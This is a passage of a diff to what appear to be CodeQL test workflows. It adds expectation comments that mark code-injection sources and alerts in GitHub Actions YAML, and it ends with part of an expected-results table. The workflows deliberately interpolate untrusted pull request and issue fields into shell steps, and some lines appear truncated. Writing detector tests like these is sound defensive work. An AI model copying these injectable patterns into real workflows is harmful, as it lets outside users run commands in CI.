'.pull_request.number' artifacts/event_file/event.json) @@ -51,6 +51,6 @@ jobs: actions: read statuses: write steps: - - run: echo ${{ needs.get-artifacts.outputs.pr_num }} - - run: echo ${{ needs.get-artifacts.outputs.ref }} + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ needs.get-artifacts.outputs.ref }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml index f81bef89568..e141ea55a11 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -7,7 +7,7 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.title || "foo" }}" + - run: echo "${{ github.event.pull_request.title || "foo" }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml index 1e5c7eec177..876141d0e17 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -7,8 +7,8 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.changes.body.from }}" - - run: echo "${{ github.event.changes.title.from }}" - - run: echo "${{ github.event.changes.head.ref.from }}" - - run: echo "${{ toJson(github.event.changes) }}" + - run: echo "${{ github.event.changes.body.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.title.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.head.ref.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ toJson(github.event.changes) }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml index 6d925a82d37..df3dd6e8a11 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -12,8 +12,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: @@ -23,8 +23,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "files=${FILES}" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=${FILES}" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: @@ -33,8 +33,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: @@ -44,8 +44,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml index a39967760e8..bc06e8a525d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml @@ -9,30 +9,30 @@ jobs: steps: - id: title run: | - echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: - id: title run: | - echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml index 0b3002506a1..bf5346b330d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml @@ -30,7 +30,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-id - - name: get PR id + - name: get PR id # $ Source[actions/code-injection/critical] id: pr run: echo "value=$(> $GITHUB_OUTPUT @@ -42,7 +42,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-ref - - name: get PR ref + - name: get PR ref # $ Source[actions/code-injection/critical] id: ref run: echo "value=$(> $GITHUB_OUTPUT @@ -122,7 +122,7 @@ jobs: - name: Get commit message id: commit-message - run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] # ================= Deploy Demo ================= - name: 📦 Build demo @@ -227,5 +227,5 @@ jobs: "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" } - } + } # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml index 559c69c4710..712c6fb8100 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -19,10 +19,10 @@ jobs: route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Set PR source branch as env variable + - name: Set PR source branch as env variable # $ Source[actions/code-injection/critical] if: github.event_name == 'issue_comment' run: | - PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') # $ Alert[actions/code-injection/critical] echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV setup2: runs-on: ubuntu-latest @@ -36,13 +36,13 @@ jobs: pull_number: ${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - - name: Set environment variables + - name: Set environment variables # $ Source[actions/code-injection/critical] run: | MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV - echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] setup3: runs-on: ubuntu-latest steps: @@ -52,8 +52,8 @@ jobs: route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} - - run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + - run: | # $ Source[actions/code-injection/critical] + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] setup4: runs-on: ubuntu-latest steps: @@ -65,10 +65,10 @@ jobs: repo: bar pull_number: ${{ github.event.issue.number }} - - run: >- + - run: >- # $ Source[actions/code-injection/critical] echo "Pull request title is \"${{ fromJson(steps.get-pull-request.outputs.data).title }}\" but expected - \"Updated test pull request\"" && exit 1 + \"Updated test pull request\"" && exit 1 # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml index 552ad866b5a..ba51066def8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -13,9 +13,9 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} - - name: Write issues to file + - name: Write issues to file # $ Source[actions/code-injection/critical] run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] - name: Setup Node.js uses: actions/setup-node@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml index 2773c1044db..9ee26e0d626 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml @@ -10,102 +10,102 @@ jobs: - id: head_ref run: | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh pr view $PR_NUMBER --json body --jq .body) - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: author run: | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] pulls2: runs-on: ubuntu-latest steps: - id: head_ref run: | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: author run: | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] issues1: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] issues2: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] pulls3: runs-on: ubuntu-latest steps: @@ -113,20 +113,20 @@ jobs: run: | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $DETAILS | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title1.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title1.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title2 run: | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title2.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title2.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title3 run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author) TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title3.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title3.outputs.title}}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml index 03ee63fe9cf..5bca1705b9d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -22,9 +22,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 1 + - name: Changed files 1 # $ Source[actions/code-injection/critical] run: | - echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 @@ -34,9 +34,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 2 + - name: Changed files 2 # $ Source[actions/code-injection/critical] run: | - echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed:${{ steps.changed2.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed2.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml index 27d8a666fc9..9f906d507cf 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -12,7 +12,7 @@ jobs: echo " " echo "github.ref = ${{ github.ref }}" echo "github.sha = ${{ github.sha }}" - echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" # $ Alert[actions/code-injection/medium] echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml index 03ecc20de86..292891b8ccb 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -19,6 +19,6 @@ jobs: id: extract_info shell: bash run: | - echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT - echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT - echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml index c1846b8f51e..3661cd885a4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -14,6 +14,6 @@ jobs: label_marker_start: '>>' label_marker_end: '<<' - - name: Show parsed data JSON + - name: Show parsed data JSON # $ Source[actions/code-injection/critical] run: | - echo ${{ steps.parse.outputs.payload }} + echo ${{ steps.parse.outputs.payload }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml index 0bd666dc948..5cf1093c8bb 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -9,5 +9,5 @@ jobs: - name: Issue Forms Body Parser id: parse uses: zentered/issue-forms-body-parser@v2.0.0 - - run: echo ${{ steps.parse.outputs.data }} - - run: echo ${{ toJSON(steps.parse.outputs.data) }} + - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml index 8648d86983e..532ce731d10 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -17,7 +17,7 @@ jobs: - name: Fetch the issue id: read_issue_body run: - echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] - name: Issue Forms Body Parser id: parse @@ -25,5 +25,5 @@ jobs: with: body: ${{ steps.read_issue_body.outputs.body }} - - run: echo ${{ steps.parse.outputs.data }} - - run: echo ${{ toJSON(steps.parse.outputs.data) }} + - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml index e9ba77c0f93..86e76277f6e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml @@ -38,7 +38,7 @@ jobs: persist-credentials: false ref: ${{ steps.get-sha.outputs.sha }} fetch-depth: 0 - - name: Get version + - name: Get version # $ Source[actions/code-injection/critical] id: get-version run: | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 